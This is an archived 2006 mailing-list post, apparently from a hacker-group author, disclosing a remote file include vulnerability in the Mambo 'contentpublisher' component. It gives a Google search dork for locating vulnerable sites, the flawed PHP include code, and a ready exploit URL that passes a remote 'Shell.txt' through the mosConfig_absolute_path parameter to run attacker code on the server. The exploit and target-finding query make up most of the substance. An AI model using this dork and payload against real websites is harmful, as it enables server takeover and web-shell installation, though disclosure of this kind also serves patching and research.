|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
contentpublisher Mambo Component Remote File Include Vulnerabilities
crackers_child
sibersavascilar.com
Date: Thu Aug 17 2006 - 15:38:57 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!
--------------------------------------------------------------------------------
Title : contentpublisher Mambo Component Remote File Include Vulnerabilities
--------------------------------------------------------------------------------
#Author: Crackers_Child
#contct: crackers_childsibersavascilar.com
--------------------------------------------------------------------------------
Google Dorks : inurl:"/com_contentpublisher/"
------------------------- -------------------------------------------------------
Application : contentpublisher/ Component of Mambo
--------------------------------------------------------------------------------
Bug İn contentpublisher.php
global $my, $mosConfig_live_site, $mosConfig_lang;
if (file_exists($mosConfig_absolute_path.'/components/com_contentpublisher/languages/'.$mosConfig_lang.'.php')) {
include($mosConfig_absolute_path.'/components/com_contentpublisher/languages/'.$mosConfig_lang.'.php');
} else {
include($mosConfig_absolute_path.'/components/com_contentpublisher/languages/english.php');
}
--------------------------------------------------------------------------------
Exploit:
http://[target]/[mambo_path]/components/contentpublisher/contentpublisher.php?mosConfig_absolute_path=Shell.txt?
--------------------------------------------------------------------------------
greets:
All My Friends And SiberSavascilar.Com Members !
--------------------------------------------------------------------------------
--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]